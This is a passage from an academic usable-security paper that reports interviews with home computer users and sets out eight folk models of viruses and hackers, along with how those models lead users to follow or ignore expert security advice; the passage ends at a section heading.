by Rick Wash / at SOUPS (Symposium on Usable Privacy and Security)

Home computer systems are insecure because they are administered by untrained users. The rise of botnets has amplified this problem; attackers compromise these computers, aggregate them, and use the resulting network to attack third parties. Despite a large security industry that provides software and advice, home computer users remain vulnerable. I identify eight ‘folk models’ of security threats that are used by home computer users to decide what security software to use, and which expert security advice to follow: four conceptualizations of ‘viruses’ and other malware, and four conceptualizations of ‘hackers’ that break into computers. I illustrate how these models are used to justify ignoring expert security advice. Finally, I describe one reason why botnets are so difficult to eliminate: they cleverly take advantage of gaps in these models so that many home computer users do not take steps to protect against them.

Home users are installing paid and free home security software at a rapidly increasing rate.{1} These systems include anti-virus software, anti-spyware software, personal firewall software, personal intrusion detection / prevention systems, computer login / password / fingerprint systems, and intrusion recovery software. Nonetheless, security intrusions and the costs they impose on other network users are also increasing. One possibility is that home users are starting to become well-informed about security risks, and that soon enough of them will protect their systems that the problem will resolve itself. However, given the “arms race” history in most other areas of networked security (with intruders becoming increasingly sophisticated and numerous over time), it is likely that the lack of user sophistication and non-compliance with recommended security system usage policies will continue to limit home computer security effectiveness. To design better security technologies, it helps to understand how users make security decisions, and to characterize the security problems that result from these decisions. To this end, I have conducted a qualitative study to understand users’ mental models [18, 11] of attackers and security technologies. Mental models describe how a user thinks about a problem; it is the model in the person’s mind of how things work. People use these models to make decisions about the effects of various actions [17]. In particular, I investigate the existence of folk models for home computer users. Folk models are mental models that are not necessarily accurate in the real world, thus leading to erroneous decision making, but are shared among similar members of a culture[11]. It is well-known that in technological contexts users often operate with incorrect folk models [1]. To understand the rationale for home users’ behavior, it is important to understand the decision model that people use. If technology is designed on the assumption that users have correct mental models of security threats and security systems, it will not induce the desired behavior when they are in fact making choices according to a different model. As an example, Kempton [19] studied folk models of thermostat technology in an attempt to understand the wasted energy that stems from poor choices in home heating. He found that his respondents possessed one of two mental models for how a thermostat works. Both models can lead to poor decisions, and both models can lead to correct decisions that the other model gets wrong. Kempton concludes that “Technical experts will evaluate folk theory from this perspective [correctness] – not by asking whether it fulfills the needs of the folk. But it is the latter criterion […] on which sound public policy must be based.” The same argument holds for technology design: whether the folk models are correct or not, technology should be designed to work well with the folk models actually employed by users.{2} For home computer security, I study two related research questions: 1) Potential threats : How do home computer users conceptualize the information security threats that they face? 2) Security responses : How do home computer users apply their mental models of security threats to make security-relevant decisions? Despite my focus on “home computer users,” many of these problems extend beyond the home; most of my analysis and understanding in this paper is likely to generalize to a whole class of users who are unsophisticated in their security decisions. This includes many university computers, computers in small business that lack IT support, and personal computers used for business purposes.

{1} Despite a worldwide recession, the computer security industry grew 18.6% in 2008, totaling over $13 billion according to a recent Gartner report [9]
{2} It may be that users can be re-educated to use more correct mental models, but generally it more difficult to re-educate

1.1 Understanding Security
Managing the security of a computer system is very difficult. Ross Anderson’s [2] study of Automated Teller Machine (ATM) fraud found that the majority of the fraud committed using these machines was not due to technical flaws, but to errors in deployment and management failures. These problems illustrate the difficulty that even professionals face in producing effective security. The vast ma jority of home computers are administered by people who have little security knowledge or training. Existing research has investigated how non-expert users deal with security and network administration in a home environment. Dourish et al. [12] conducted a related study, inquiring not into mental models but how corporate knowledge workers handled security issues. Gross and Rossum [15] also studied what security knowledge end users posses in the context of large organizations. And Grinter et al. [14] interviewed home network users about their network administration practices. Combining the results from these papers, it appears that many users exert much effort to avoid security decisions. All three papers report that users often find ways to delegate the responsibility for security to some external entity; this entity could be technological (like a firewall), social (another person or IT staff ), or institutional (like a bank). Users do this because they feel like they don’t have the skills to maintain proper security. However, despite this delegation of responsibility, many users still make numerous security-related decisions on a regular basis. These papers do not explain how those decisions get made; rather, they focus mostly on the anxiety these decisions create. I add structure to these observations by describing how folk models enable home computer users to make security decisions they cannot delegate. I also focus on differences between people, and characterize different methods of dealing with security issues rather than trying to find general patterns. The folk models I describe may explain differences observed between users in these studies. Camp [6] proposed using mental models as a framework for communicating complex security risks to the general populace. She did not study how people currently think about security, but proposed five possible models that may be useful. These models take the form of analogies or metaphors with other similar situations: physical security, medical risks, crime, warfare, and markets. Asghapour et al. [3] built on this by conducting a card sorting experiment that matches these analogies with the mental models of uses. They found that experts and non-experts show sharp differences in which analogy their mental model is closest to. Camp et al. began by assuming a small set of analogies that they believe function as mental models. Rather than pre-defining the range of posssible models, I treat these mental models as a legitimate area for inductive investigation, and endeavor to uncover users’ mental models in whatever form they take. This prior work confirms that the concept of mental models may be useful for home computer security, but made assumptions which may or may not be appropriate. I fill in the gap by inductively developing an understanding of just what mental models people actually possess. Also, given the vulnerability of home computers and this finding that experts and non-experts differ sharply [3], I focus solely on non-expert home computer users. Herley [16] argues that non-expert users reject security advice because it is rational do to so. He believes that security experts provide advice that ignores the costs of the users’ time and effort, and therefore overestimates the net value of security. I agree, though I dig deeper into understanding how users actually make these security / effort tradeoffs.

1.2 Botnets and Home Computer Security
In the past, computers were targeted by hackers approximately in proportion to the amount of value stored on them or accessible from them. Computers that stored valuable information, such as bank computers, were a common target, while home computers were fairly innocuous. Recently, attackers have used a technique known as a ‘botnet,’ where they hack into a number of computers and install special ‘control’ software on those computers. The hacker can give a master control computer a single command, and it will be carried out by all of the compromised computers (called zombies) it is connected to [4, 5]. This technology enables crimes that require large numbers of computers, such as spam, click fraud, and distributed denial of service [26]. Observed botnets range in size from a couple hundred zombies to 50,000 or more zombies. As John Markoff of the New York Times observes, botnets are not technologically novel; rather, “what is new is the vastly escalating scale of the problem” [21]. Since any computer with an Internet connection will be an effective zombie, hackers have logically turned to attacking the most vulnerable population: home computers. Home computer users are usually untrained and have few technical skills. While some software has improved the average level of security of this class of computers, home computers still represent the largest population of vulnerable computers. When compromised, these computers are often used to commit crimes against third parties. The vulnerability of home computers is a security problem for many companies and individuals who are the victims of these crimes, even if their own computers are secure [7].

1.3 Methods
I conducted a qualitative inquiry into how home computer users understand and think about potential threats. To develop depth in my exploration of the folk models of security, I used an iterative methodology as is common in qualitative research [24]. I conducted multiple rounds of interviews punctuated with periods of analysis and tentative conclusions. The first round of 23 semi-structured interviews was conducted in Summer 2007. Preliminary analysis proceeded throughout the academic year, and a second round of 10 interviews was conducted in Summer 2008, for a total of 33 respondents. This second round was more focused, and specifically searched for negative cases of earlier results [24]. Interviews averaged 45 minutes each; they were audio recorded and transcribed for analysis. Respondents were chosen from a snowball sample [20] of home computer users evenly divided between three mid-western U.S. cities. I began with a few home computer users that I knew in these cities. I asked them to refer me to others in the area who might be information-rich informants. I screened these potential respondents to exclude people who had expertise or training in computers or computer security. From those not excluded, I purposefully selected respondents for maximum variation [20]: I chose respondents from a wide variety of backgrounds, ages, and socio-economic classes. Ages ranged from undergraduate (19 years old) up through retired (over 70). Socio-economic status was not explicitly measured, but ranged from recently graduated artist living in a small efficiency up to a successful executive who owns a large house overlooking the main river through town. Selecting for maximal variation allows me to document diverse variations in folk models and identify important common patterns [20]. After interviewing the chosen respondents, I grew by potential interview pool by asking them to refer me to more people with home computers who might provide useful information. This snowballing through recommendations ensured that the contacted respondents would be information-rich [20] and cooperative. These new potential respondents were also screened, selected, and interviewed. The method does not generate a sample that is representative of the population of home computer users. However, I don’t believe that the sample is a particularly special or unusual group; it is likely that there are other people like them in the larger population.

I developed an (IRB approved) face-to-face semi-structured interview protocol that pushes sub jects to describe and use their mental models, based on formal methods presented by D’Andrade [11]. I specifically probed for past instances where the respondents would have had to use their mental model to make decisions, such as past instances of security problems, or efforts undertaken to protect their computers. By asking about instances where the model was applied to make decisions, I enabled the respondents to uncover beliefs that they might not have been consciously aware of. This also ensures that the respondents believe their model enough to base choices on it. The ma jority of each interview was spent on follow-up questions, probing deeper into the responses of the sub ject. This method allows me to describe specific, detailed mental models that my participants use to make security decisions, and to be confident that these are models that the participants actually believe. My focus in the first round was broad and exploratory. I asked about any security-related problems the respondent had faced or was worried about; I also specifically asked about viruses, hackers, data loss, and data exposure (identity theft). I probed to discover what countermeasures the respondents used to mitigate these risks. Since this was a semi-structured interview, I followed up on many responses by probing for more information. After preliminary analysis of this data, I drew some tentative conclusions and listed points that needed clarification. To better elucidate these models and to look for negative cases, I conducted 10 second-round interviews using a new (IRB approved) interview protocol. In this round, I focused more on three specific threats that sub jects face: viruses, hackers, and identity theft. For this second round, I also used an additional interviewing technique: hypothetical scenarios. This technique was developed to help focus the respondents and elicit additional information not present in the first round of interviews. I presented the respondents with three hypothetical scenarios and asked the sub jects for their reaction. The three scenarios correspond to each of the three main themes for the second round: finding out you have a virus, finding out a hacker has conpromised your computer, and being informed that you are a victim of identity theft. For each scenario, after the initial description and respondent reaction, I added an additional piece of information that contradicted the mental models I discovered after the first round. For example, one preliminary finding from the first round was that people rarely talked about the creation of computer viruses; it was unclear how they would react to a computer virus that was created by people for a purpose. In the virus scenario, I informed the respondents that the virus in question was written by the Russian mafia. This fact was taken out of recent news linking the Russian mafia to widespread viruses such as Netsky, Bagle, and Storm.{3} Once I had all of the data collected and transcribed, I conducted both inductive and deductive coding of the data to look both for predetermined and emergent themes [23]. I began with a short list of ma jor themes I expected to see from my pilot interviews, such as information about viruses, hackers, identity theft, countermeasures, and sources of information. I identified and labeled (coded) instances when the respondents discussed these themes. I then expanded the list of codes as I noticed interesting themes and patterns emerging. Once all of the data was coded, I summarized the data on each topic by building a data matrix [23].{4} This data matrix helped me to identify basic patterns in the data across sub jects, to check for representativeness, and to look for negative cases [24].

After building the initial summary matrices, I identified patterns in the way respondents talked about each topic, paying specific attention to word choices, metaphors employed, and explicit content of statements. Specifically, I looked for themes in which users differ in their opinions (negative case analysis). These themes became the building blocks for the mental models. I built a second matrix that matched sub jects with these features of mental models.{5} This second matrix allowed me to identify and characterize the various mental models that I encountered. Table 7 in the Appendix shows which participants from Round 2 had each of the 8 models. A similar table was developed for the Round 1 participants. I then took the description of the model back to the data, verified when the model description accurately represented the respondents descriptions, and looked for contradictory evidence and negative cases [24]. This allowed me to update the models with new information or insights garnered by following up on surprises and incorporating outliers. This was an iterative process; I continued updating model descriptions, looking for negative cases, and checking for representativeness until I felt that the model descriptions I had accurately represented the data. In this process, I developed further matrices as data visualizations, some of which appear in my descriptions below.

{4} A fragment of this matrix can be seen in Table 5 in the Appendix.
{5} A fragment of this matrix is Table 6 in the Appendix.

I identified a number of different folk models in the data. Every folk model was shared by multiple respondents in this study. The purpose of qualitative research is not to generalize to a population; rather, it is to explore phenomenon in depth. To avoid misleading readers, I do not report how many users possessed each folk model. Instead, I describe the full range of folk models I observed. I divide the folk models into two broad categories based on a distinction that most sub jects possessed: 1) models about viruses, spyware, adware, and other forms of malware which everyone refered to under the umbrella term ‘virus’; and 2) models about the attackers, referred to as ‘hackers,’ and the threat of ‘breaking in to’ a computer. Each respondent had at least one model from each of the two categories. For example, Nicole {6} believed that viruses were mischievous, and hackers are criminals who target big fish. These models are not necessarily mutually exclusive. For example, a few respondents talked about different types of hackers and would describe more than one folk model of hackers. Note that by listing and describing these folk models, in no way do I intend to imply that these models are incorrect or bad in any way. They are all certainly incomplete, and do not exactly correspond to the way malicious software or malicious computer users behave. But, as Kempton [19] learned in his study of home thermostats, what is important is not how accurate the model is but how well it serves the needs of the home computer user in making security decisions. Additionally, there is not “correct” model that can serve as a comparison. Even security experts will disagree as to the correct way to think about viruses or hackers. To show an extreme example, Medin et al. [22] conducted a study of expert fishermen in the Northwoods of Wisconsin. They looked at the mental models of both Native American fishermen and of majority-culture fishermen. Despite both groups being experts, the two groups showed dramatic differences in the way fish were categorized and classified. Majority-culture fishermen grouped fish into standard taxonomic and goal-oriented groupings, while Native American fishermen groups fish mostly by ecological niche. This illustrates how even experts can have dramatically different mental models of the same phenomenon, and any single expert’s model is not necessarily correct. However, experts and novices do tend to have very different models; Asgharpour et al. [3] found strong differences between expert and novice computer users in their mental models of security.

Common Elements of Folk Models
Most respondents made a distinction between ‘viruses’ and ‘hackers.’ To them, these are two separate threats that can both cause problems. Some people believed that viruses are created by hackers, but they still usually saw them as distinct threats. A few respondents realized this and tried to describe the difference; for example at one point in the interview Irving tries to explain the distinction by saying “The hacker is an individual hacking, while the virus is a program infecting.” After some thought, he clarifies his idea of the difference a bit: “So it’s a difference between something automatic and more personal.” This description is characteristic of how many respondents think about the difference: viruses are usually more programatic and automatic, where hacking is more like manual labor, requiring the hacker to be sitting in front of a computer entering commands. This distinction between hackers and viruses is not something that most of the respondents had thought about; it existed in their mental model but not at a conscious level. Upon prompting, Dana decides that “I guess if they hack into your system and get a virus on there, it’s gonna be the same thing.” She had never realized that they were distinct in her mind, but it makes sense to her that they might be related. She then goes on to ask the interviewer if she gets hacked, can she forward it on to other people? This also illustrates another common feature of these interviews. When exposed to new information, most of the respondents would extrapolate and try to apply that information to slightly different settings. When Dana was prompted to think about the relationship between viruses and hackers, she decided that they were more similar than she had previously realized. Then she began to apply ideas from one model (viruses spreading) to the other model (can hackers spread also?) by extrapolating from her current models. This is a common technique in human learning and sensemaking [25]. I suspect that many details of the mental models were formed in this way. Extrapolation is also useful for analysis; how respondents extrapolate from new information reveals details about mental models that are not consciously salient during interviews [8, 11]. During the interviews I used a number of prompts that were intended to challenge mental models and force users to extrapolate in order to help surface more elements of their mental models.

2.1 Models of Viruses and other Malware
All of the respondents had heard of computer viruses and possessed some mental model of their effects and transmission. The respondents focused their discussion primarily on the effects of viruses and the possible methods of transmission. In the second round of interviews, I prompted respondents to discuss how and why viruses are created by asking them to react to a number of hypothetical scenarios. These scenarios help me understand how the respondents apply these models to make security-relevant decisions. All of the respondents used the term ‘virus’ as a catch-all term for malicious software. Everyone seemed to recognize that viruses are computer programs. Almost all of the respondents classify many different types of malicious software under this term: computer viruses, worms, tro jans, adware, spyware, and keyloggers were all mentioned as ‘viruses.’ The respondents don’t make the distinctions that most experts do; they just call any malicious computer program a ‘virus.’ Thanks to the term ‘virus,’ all of the respondents used some sort of medical terminology to describe the actions of malware. Getting malware on your computer means you have ‘caught’ the virus, and your computer is ‘infected.’ Everyone who had a Mac seemed to believe that Macs are ‘immune’ to virus and hacking problems (but were worried anyway).

Overall, I found four distinct folk models of ‘viruses.’ These models differed in a number of ways. One of the major differences is how well-specified and detailed the model was, and therefore how useful the model was for making security-related decisions. One model was very under-specified, labeling viruses as simply ‘bad.’ Respondents with this model had trouble using it to make any kind of security-related decisions because the model didn’t contain enough information to provide guidance. Two other models (the Mischief and Crime models) were fairly well-described, including how viruses are created and why, and what the ma jor effects of viruses are. Respondents with these models could use them to extrapolate many different situations and use them to make many security-related decisions on their computer. Table 1 summarizes the major differences between the four models.

{6} All respondents have been given pseudonyms for anonymity.

2.1.1 Viruses are Generically ‘Bad’
A few subjects had a very under-developed model of viruses. These subjects knew that viruses cause problems, but these sub jects couldn’t really describe the problems that viruses cause. They just knew that they were generically ‘bad’ to get and should be avoided. Respondents with this model knew of a number of different ways that viruses are transmitted. These transmission methods seemed to be things that the subjects had heard about somewhere, but the respondents did not attempt to understand these or organize them into a more coherent mental model. Zoe believed that viruses can come from strange emails, or from “searching random things” on the Internet. She says she had heard that blocking popups helps with viruses too, and seemed to believe that without questioning. Peggy had heard that viruses can come from “blinky ads like you’ve won a million bucks.” Respondents with this model are uniformly unconcerned with getting viruses: “I guess just my lack of really doing much on the Internet makes me feel like I’m safer.” (Zoe). A couple of people with this model use Macintosh computers, which they believe to be “immune” to computer viruses. Since they are immune, it seems that they have not bothered to form a more complete model of viruses. Since these users are not concerned with viruses, they do not take any precautions against being infected. These users believe that their current behavior doesn’t really make them vulnerable, so they don’t need to go to any extra effort. Only one respondent with this model uses an anti-virus program, but that is because it came installed on the computer. These respondents seem to recognize that anti-virus software might help, but are not concerned enough to purchase or install it.

2.1.2 Viruses are Buggy Software
One group of respondents saw computer viruses as an exceptionally bug-ridden form of regular computer software. In many ways, these respondents believe that viruses behave much like most of the other software that home users experience. But to be a virus, it has to be ‘bad’ in some additional way. Primarily, viruses are ‘bad’ in that they are poorly written software. They lead to a multitude of bugs and other errors in the computer. They bring out bugs in other pieces of software. They tend to have more bugs, and worse bugs, than most other pieces of software. But all of the effects they cause are the same types of effects you get from buggy software: viruses can cause computers to crash, or to “boot me out” (Erica) of applications that are running; viruses can accidentally delete or “wipe out” information (Christine and Erica); they can erase important system files. In general, the computer just “doesn’t function properly” (Erica) when it has a virus. Just like normal software, viruses must be intentionally placed on the computer and executed. Viruses do not just appear on a computer. Rather than ‘catching’ a virus, computers are actively infected, though often this infection is accidental. Some viruses come in the form of email attachments. But they are not a threat unless you actually “click” on the attachment to run it. If you are careful about what you click on, then you won’t get the virus. Another example is that viruses can be downloaded from websites, much like many other applications. Erica believes that sometimes downloading games can end up causing you to download a virus. But still, intentional downloading and execution is necessary to be infected with a virus, much the same way that intentional downloading and execution is necessary to run programs from the Internet. Respondents with this model did not feel that they needed to exert a lot of effort to protect themselves from viruses. Mostly, these users tried to not download and execute programs that they didn’t trust. Sarah intentionally “limits herself ” by not downloading any programs from the Internet so she doesn’t get a virus. Since viruses must be actively executed, anti-virus program are not important. As long as no one downloads and runs programs from the Internet, no virus can get onto the computer. Therefore, anti-virus programs that detect and fix viruses aren’t needed. However, two respondents with this model run anti-virus software just in case a virus is accidentally put on the computer. Overall, this is a somewhat underdeveloped mental model of viruses. Respondents who possessed this model had never really thought about how viruses are created, or why. When asked, they talk about how they haven’t thought about it, and then make guesses about how ‘bad people’ might be the ones who create them. These respondents haven’t put too much thought into their mental model of viruses; all of the effects they discuss are either effects they have seen or more extreme versions of bugs they have seen in other software. Christine says “I guess I would know [if I had a virus], wouldn’t I?” presuming that any effects the virus has would be evident in the behavior of the computer. No connection is made between hackers and viruses; they are distinct and separate entities in the respondent’s mind.

2.1.3 Viruses Cause Mischief
A good number of respondents believed that viruses are pieces of software that are intentionally annoying. Someone created the virus for the purpose of annoying computer users and causing mischief. Viruses sometimes have effects that are often much like extreme versions of annoying bugs: crashing your computer, deleting important files so your computer won’t boot, etc. Often the effects of viruses are intentionally annoying such as displaying a skull and crossbones upon boot (Bob), displaying advertising popups (Floyd), or downloading lots of pornography (Dana). While these respondents believe that viruses are created to be annoying, they rarely have a well-developed idea of who created them. They don’t naturally mention a creator for the viruses, just a reason why they are created. When pushed, these respondents will talk about how they are probably created by “hackers” who fit the Graffiti hacker model below. But the identity of the creator doesn’t play much of a role in making security decisions with this model. Respondents with this model always believe that viruses can be “caught” by actively clicking on them and executing them. However, most respondents with this model also believe that viruses can be “caught” by simply visiting the wrong webpages. Infection here is very passive and can come from just from visiting the webpage. These webpages are often considered to be part of the ‘bad’ part of the Internet. Much like graffiti appears in the ‘bad’ parts of cities, mischievous viruses are most prevalent on the bad parts of the Internet. While most everyone believes that care in clicking on attachments or downloads is important, these respondents also try to be careful about where they go on the Internet. One respondent (Floyd) tries to explain why: cookies are automatically put on your computer by websites, and therefore, viruses being automatically put on your computer could be related to this. These ‘bad’ parts of the Internet where you can easily contract viruses are frequently described as morally ambiguous webpages. Pornography is always considered shady, but some respondents also included entertainment websites where you can play games, and websites that have been on the news like “MySpaceBook” (Gina). Some respondents believed that a “secured” website would not lead to a virus, but Gail acknowledged that at some sites “maybe the protection wasn’t working at those sites and they went bad.” (Note the passive tense; again, she has not thought about how site go bad or who causes them to go bad. She is just concerned with the outcome.)

2.1.4 Viruses Support Crime
Finally, some respondents believe that viruses are created to support criminal activities. Almost uniformly, these respondents believe that identity theft is the end goal of the criminals who create these viruses, and the viruses assist them by stealing personal and financial information from individual computers. For example, respondents with this model worry that viruses are looking for credit card numbers, bank account information, or other financial information stored on their computer. Since the main purpose of these viruses is to collect information, the respondents who have this model believe that viruses often remain undetected on computers. These viruses do not explicitly cause harm to the computer, and they do not cause bugs, crashes, or other problems. All they do is send information to criminals. Therefore, it is important to run an anti-virus program on a regular basis because it is possible to have a virus on your computer without knowing it. Since viruses don’t harm your computer, backups are not necessary. People with this model believed that there are many different ways for these viruses to spread. Some viruses spread through downloads and attachments. Other viruses can spread “automatically,” without requiring any actions by the user of the computer. Also, some people believe that hackers will install this type of virus onto the computer when they break in. Given this wide variety of transmission methods and the serious nature of identity theft, respondents with this model took many steps to try to stop these viruses. These users would work to keep their anti-virus up to date, purchasing new versions on a regular basis. Often, they would notice when the anti-virus would conduct a scan of their computer and check the results. Valerie would even turn her computer off when it is not in use to avoid potential problems with viruses.

2.1.5 Multiple Types of Viruses
A couple of respondents discussed multiple types of viruses on the Internet. These respondents believed that some viruses are mischievous and cause annoying problems, while other viruses support crime and are difficult to detect. All users that talked about more than one type of virus talked about both of the previous two virus folk models: the mischievous viruses and the criminal viruses. One respondent, Jack, also talked about a third type of virus that was created by anti-virus companies, but he seemed like he felt this was a conspiracy theory, and consequently didn’t take that suggestion very seriously. For the respondents with multiple models, they generally would take all of the precautions that either model would predict. For example, they would make regular backups in case they caught a mischievous virus that damaged their computer, but they also would regularly run their anti-virus program to detect the criminal viruses that don’t have noticeable effects. This fact suggests that information sharing between users may be beneficial; when users believe in multiple types of viruses, they take appropriate steps to protect against all types.

2.2 Models of Hackers and Break-ins
The second ma jor category of folk models describe the attackers, or the people who cause Internet security problems. These attackers are always given the name “hackers,” and all of the respondents seemed to have some concept of who these people were and what they did. The term “hacker” was applied to describe anyone who does bad things on the Internet, no matter who they are or how they work. All of the respondents describe the main threat that hackers pose as “breaking in” to their computer. They would disagree as to why a hacker would want to “break in” to a computer, and to which computers they would target for their break ins, but everyone agreed on the terminology for this basic action. To the respondents, breaking in to a computer meant that the hacker could then use the computer as if they were sitting in front of it, and could cause a number of different things to happen to the computer. Many respondents stated that they did not understand how this worked, but they still believed it was possible. My respondents described four distinct folk models of hackers. These models differed mainly in who they believed these hackers were, what they believed motivated these people, and how they chose which computers to break in to. Table 2 summarizes the four folk models of hackers.

2.2.1 Hackers are Digital Graffiti Artists
One group of respondents believe that hackers are technically skilled people causing mischief. There is a collection of individuals, usually called “hackers,” that use computers to cause a technological version of mischief. Often these users are envisioned as “college-age computer types” (Kenneth). They see hacking computers as sort of digital graffiti; hackers break in to computers and intentionally cause problems so they can show off to their friends. Victim computers are a canvas for their art. When respondents with this model talked about hackers, they usually focused on two features: strong technical skills and the lack of proper moral restraint. Strong technical skills provide the motivation; hackers do it ”for sheer sport” (Lorna) or to demonstrate technical prowess (Hayley). Some respondents envision a competition between hackers, where more sophisticated viruses or hacks “prove you’re a better hacker” (Kenneth); others see creating viruses and hacking as part of “learning about the Internet” (Jack). Lack of moral restraint is what makes them different than others with technical skills; hackers are sometimes described as people as maladjusted individuals who “want to hurt others for no reason.” (Dana) Respondents will describe hackers as ”miserable” people. They feel that hackers do what they do for no good reason, or at least no reason they can understand. Hackers are believed to be lone individuals; while they may have hacker friends, they are not part of any organization. Users with this model often focus on the identity of the hacker. This identity – a young computer geek with poor morals – is much more developed in their mind than the resulting behavior of the hacker. As such, people with this model can usually talk clearly and give examples of who hackers are, but seem less confident in information about the resulting break-ins that happen. These hackers like to break stuff on the computer to create havoc. They will intentionally upload viruses to computers to cause mayhem. Many sub jects believe that hackers intentionally cause computers harm; for example Dana believes that hackers will “fry your hard drive.” (Dana) Hackers might install software to let them control your computer; Jack talked about how a hacker would use his instant messenger to send strange messages to his friends. These mischievous hackers were seen as not targetting specific individuals, but rather choosing random strangers to target. This is much like graffiti; the hackers need a canvas and choose whatever computer they happen to come upon. Because of this, the respondents felt like they might become a victim of this type of hacking at any time. Often, victims like this felt like there wasn’t much they could to do protect themselves from this type of hacking. This was because respondents didn’t understand how hackers were able to break into computers, so they didn’t know what could be done to stop it. This would lead to a feeling of futility; “if they are going to get in, they’re going to get in.” (Hayley) This feeling of futility echoes similar statements discussed by Dourish et al. [12].

2.2.2 Hackers are Burglars Who Break Into Computers for Criminal Purposes
Another set of respondents believe that hackers are criminals that happen to use computers to commit their crimes. Other than the use of the computer, they share a lot in common with other professional criminals: they are motivated by financial gain, and they can do what they do because they lack common morals. They would “break into” computers to look for information much like a burglar will break into houses to look for valuables. The most salient part of this folk model is the behavior of the hacker; the respondents could talk in detail about what the hackers were looking for but spoke very little about the identity of the hacker. Almost exclusively, this criminal activity is some form of identity theft. For example, respondents believe that if a hacker obtains their credit card number, for example, then that hacker can make fraudulent charges with it. But the respondents weren’t always sure what kind of information the hacker was specifically looking for; they just described it as information the hacker could use to make money. Ivan talked about how hackers would look around the computer much like a thief might rummage around in an attic, looking for something useful. Erica used a different metaphor, saying that hackers would “take a digital photo of everything on my computer” and look in it for useful identity information. Usually, the respondents envision the hacker himself using this financial information (as opposed to selling the information to others). Since hackers target information, the respondents believe that computers are not harmed by the break-ins. Hackers look for information, but do not harm the computer. They simply rummage around, “take a digital photo,” possibly install monitoring software, and leave. The computer continues to work as it did before. The main concern of the respondents is how the hacker might use the information that they steal. These hackers choose victims opportunistically; much like a mugger chooses his victims, these hackers will break into any computers they run across to look for valuable information. Or, more accurately, the respondents don’t have a good model of how hackers choose, and believe that there is a decent chance that they will be a victim someday. Gail talks about how hackers are opportunistic, saying “next time I go to their site they’ll nab me.” Hayley believes that they just choose computers to attack without knowing much about who owns them. Respondents with this belief are willing to take steps to protect themselves from hackers to avoid becoming a victim. Gail tries to avoid going websites she’s not familiar with to prevent hackers from discovering her. Jack is careful to always sign out of accounts and websites when he is finished. Hayley shuts off her computer when she isn’t using it so hackers cannot break into it.

2.2.3 Hackers are Criminals who Target Big Fish
Another group of respondents had a conceptually similar model. This group also believes that hackers are Internet criminals who are looking for information to conduct identity theft. However, this group has thought more about how these hackers can best accomplish this goal, and have come to some different conclusions. These respondents believe in “massive hacker groups” (Hayley) and other forms of organization and coordination among criminal hackers. Most tellingly, this group believes that hackers only target the “big fish.” Hackers primarily break into computers of important and rich people in order to maximize their gains. Every respondent who holds this model believes that he or she is not likely to be a victim because he or she is not a big enough fish. They believe that hackers are unlikely to ever target them, and therefore they were safe from hacking. Irving believe that “I’m small potatoes and no one is going to bother me.” They often talk about how other people are more likely targets: “Maybe if I had a lot of money” (Floyd) or “like if I were a bank executive” (Erica). For these respondents, protecting against hackers isn’t a high priority. Mostly they find reasons to trust existing security precautions rather than taking extra steps to protect themselves. For example, Irving talked about how he trusts his pre-installed firewall program to protect him. Both Irving and Floyd trust their passwords to protect them. Basically, their actions indicate that they believe in the speed bump theory: by making it slightly hard for hackers using standard security technologies, hackers will decide it isn’t worthwhile to target them.

2.2.4 Hackers are Contractors Who Support Criminals
Finally, there is a sort of hybrid model of hackers. In this view, hackers the people are very similar to the mischievous graffiti-hackers from above: they are college-age, technically skilled individuals. However, their motivations are more intentional and criminal. These hackers are out to steal personal and financial information from people. Users with this model show evidence of more effort in thinking through their mental model and integrating the various sources of information they have. This model can be seen as a hybrid of the mischievous graffiti-hacker model and the criminal hacker model, integrated into a coherent form by combining the most salient part of the mischievous model (the identity of the hacker) and the most salient part of the criminal model (the criminal activities). Also, everyone who had this model expressed a concern about how hacking works. Kenneth stated that he doesn’t understand how someone can break into a computer without sitting in front of it. Lorna wondered how you can start a program running; she feels you have to be in front of the computer to do that. This indicates that these respondents are actively trying to integrate the information they have about hackers into a coherent model of hacker behavior. Since these hackers are first and foremost young technical people, the respondents believe that these hackers are not likely to be identity thieves. They believe that the hackers are more likely to sell this identity information for others to use. Since the hackers just want to sell information, the respondents reason, they are more likely to target large databases of identity information such as banks or retailers like Respondents with this model believed that hackers weren’t really their problem. Since these hackers tended to target larger institutions like banks or e-commerce websites, their own personal computers weren’t in danger. Therefore, no effort was needed to secure their personal computers. However, all respondents with this model expressed a strong concern for who they do business with online. These respondents would only make purchases or provide personal information to institutions they trusted to get the security right and figure out how to be protected against hackers. These users were highly sensitive to third parties possessing their data.

2.2.5 Multiple Types of Hackers
Some respondents believed that there were multiple types of hackers. Most of the time, these respondents would believe that some hackers are the mischievous graffiti-hackers and that other hackers are criminal hackers (using either the burglar or big fish model, but not both). These respondents would then try to make the effort to protect themselves from both types of hacker threats as necessary. It seems that there is some amount of cognitive dissonance that occurs when respondents hear about both mischievous hackers and criminal hackers. There are two ways that respondents resolve this: the simplest way to resolve this is to believe that some hackers are mischievous and other hackers are criminals, and consequently keep the models separate; a more complicated way is to try to integrate the two models into one coherent belief about hackers. This latter option involves a lot of effort making sense of the new folk model that is not as clear or as commonly shared as the mischievous and criminal models. The ‘contractor’ model of hackers is the result of this integration of the two types of hackers.

Computer security experts have been providing security advice to home computer users for many years now. There are many websites devoted to doling out security advice, and numerous technical support forums where home computer users can ask security-related questions. There has been much effort to simplify security advice so regular computer users can easily understand and follow this advice. However, many home computer users still do not follow this advice. This is evident from the large number of security problems that plague home computers. There is a disagreement among security experts as to why this advice isn’t followed. Some experts seem to believe that home users do not understand the security advice, and therefore more education is needed. Others seem to believe that home users are simply incapable of consistently making good security decisions [10]. However, none of these explanations explain which advice does get followed and which advice does not. The folk models described above begin to provide an explanation of which expert advice home computer users choose to follow, and which advice to ignore. By better understanding why people choose to ignore certain pieces of advice, we can better craft that advice and technologies to have a greater effect. In Table 3, I list 12 common pieces of security advice for home computer users. This advice was collected from the Microsoft Security at Home website {7}, the CERT Home Computer Security website {8}, and the US-CERT Cyber-Security Tips website {9}, and much of this advice is duplicated across websites. This advice represents the distilled wisdom on many computer security experts. This table then summarizes, for each folk model, whether that advice is important to follow, helpful but not essential, or not necessary to follow. To me, the most interesting entries indicate when users believe that a piece of security advice is not necessary to follow (labeled ‘xx’ in the table). These entries show how home computer users apply their folk models to determine for themselves whether a given piece of advice is important. Also interesting are the entries labeled ‘??’; these entries indicate places where users believe that the advice will help with security, but do not see the advice as so important that it must always be followed. Often users will decide that following advice labeled with ‘??’ is too costly in terms of effort or money, and decide to ignore it. Advice labeled ‘!!’ is extremely important, and the respondents feel that it should never be ignored, even if following it is inconvenient, costly, or difficult.

{7}, retrieved July 5, 2009
{8}, retrieved July 5, 2009
{9}, retrieved July 5, 2009

3.1 Anti-Virus Use
